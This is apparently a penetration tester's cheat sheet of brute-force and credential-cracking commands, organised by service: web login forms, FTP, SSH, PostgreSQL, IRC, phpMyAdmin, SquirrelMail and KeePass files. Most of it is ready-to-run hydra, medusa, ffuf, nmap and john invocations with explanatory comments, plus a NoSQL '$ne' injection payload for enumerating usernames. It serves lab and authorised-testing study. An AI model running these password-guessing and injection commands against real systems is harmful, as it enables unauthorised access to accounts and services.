Bruteforce
Basic Auth
hydra
medusa
Form Auth
hydra
# hydra's http-post-form argument is "path:request body:failure text". ^USER^
# and ^PASS^ mark where each candidate is substituted, and a response that
# contains "invalid" counts as a failed login. -l is a single login name, -P a
# password list, -vV prints every attempt, -f stops at the first valid pair.
hydra $IP http-post-form "/login.php:username=^USER^&password=^PASS^:invalid" -l <USER> -P <PASS_FILE> -vV -f
# ffuf substitutes each wordlist entry for FUZZ in the POST body. -x sends the
# requests through a proxy on 127.0.0.1:8080; -fs 206 hides responses whose
# size is 206 bytes (presumably the failed-login page of the author's target,
# so that number is specific to the page being tested).
ffuf -w <PASS_FILE> -X POST -d "username=admin&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/login.php -x http://127.0.0.1:8080 -fs 206
# This line does not guess passwords. password[$ne]=... is sent literally (the
# single quotes stop the shell expanding $ne); in MongoDB-style query syntax
# $ne means "not equal", so against a backend that passes request parameters
# into its query unchecked it shows which usernames exist. --sc 302 keeps only
# redirect responses. Coercing both fields to strings server-side removes the
# behaviour this relies on.
wfuzz -c -z file,<USER_NAMES_FILE> --sc 302 -d 'username=FUZZ&password[$ne]=NO_VALID_PASS&login=login' http://$URL
FTP
hydra
# -C reads colon-separated login:password pairs from a single file, so only the
# pairs in this default-credentials list are tried against the FTP service.
hydra -C /usr/share/wordlists/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt $IP ftp
SSH
hydra
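nmap
# Both settings go in one --script-args list: nmap appears to keep only the
# last --script-args it is given, which would drop userdb/passdb and leave
# ssh-brute running with its built-in lists.
nmap -p 22 --script ssh-brute \
--script-args userdb=users.lst,passdb=pass.lst,ssh-brute.timeout=4s <target>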
SMB
crackmapexec
hydra
RDP
ncrack
hydra
crowbar
mysql
medusa
hydra
psql
hydra
medusa
ncrack
patator
metasploit
nmap
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 $IP
WinRm
crackmapexec - brute force
crackmapexec - check a pair of credentials
crackmapexec - check if the creds are valid to access winrm
IRC
# Runs the irc-brute and irc-sasl-brute NSE scripts against port 6697, taking
# login names from users.txt and passwords from rockyou.txt; -sV adds service
# version detection on that port.
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=users.txt,passdb=/usr/share/wordlists/rockyou.txt -p 6697 $IP
kdbx
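# Write the KeePass database's master-key hash to ceh.hash in John's format.
keepass2john CEH.kdbx > ceh.hash
# Run the wordlist against that same file; the original pointed john at
# hash.txt, which the previous step never creates.
john ceh.hash --wordlist=/usr/share/wordlists/rockyou.txt
# Open the database in kpcli, which prompts for the master password.
kpcli --kdb CEH.kdbx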
VNC
hydra
ncrack
medusa
Unshadow
john
hashcat
Crack id_rsa
Crack nt hash
phpmyadmin
hydra
# HYDRA_PROXY_HTTP makes hydra send its HTTP requests through the proxy on
# 127.0.0.1:8080.
export HYDRA_PROXY_HTTP=http://127.0.0.1:8080
# Login root with passwords from rockyou.txt against the phpMyAdmin login form;
# a response containing "denied" counts as a failed attempt, -vV prints every
# attempt and -F stops at the first valid pair.
# NOTE(review): token= is a fixed literal in the request body. phpMyAdmin
# issues this value per session as its CSRF token, so this is presumably a
# sample copied from the author's own session.
hydra -F -vV -l root -P /usr/share/wordlists/rockyou.txt $IP http-post-form "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1&token=a6afebdd3311fac747d68adb1a8bd7ca:denied"
medusa
# The same phpMyAdmin login test with medusa's web-form module: -h is the
# host, -u the login name, -P the password list and -M the module. The -m
# options give the form path (FORM), the text that marks a failed login
# (DENY-SIGNAL) and the POST fields (FORM-DATA).
# NOTE(review): the token in FORM-DATA is a literal value, as in the hydra
# command for the same form; "&&token=i=" looks unusual, so confirm the field
# list against the actual form.
medusa \
-h $IP \
-u root \
-P /usr/share/wordlists/rockyou.txt \
-M web-form \
-m FORM:"phpmyadmin/index.php" \
-m DENY-SIGNAL:"denied" \
-m FORM-DATA:"post?pma_username=&pma_password=&server=1&&token=i=TQRF[zI*sEkNu@"
SquirrelMail 1.2.10
hydra
# Form login on SquirrelMail's redirect.php. F=incorrect marks a response
# containing "incorrect" as a failed login; -V prints each attempt, -F stops
# at the first valid pair and -u loops over users rather than passwords.
hydra -l <USER> -P <PASS_FILE> $IP http-post-form "/webmail/src/redirect.php:username=^USER^&password=^PASS^:F=incorrect" -V -F -u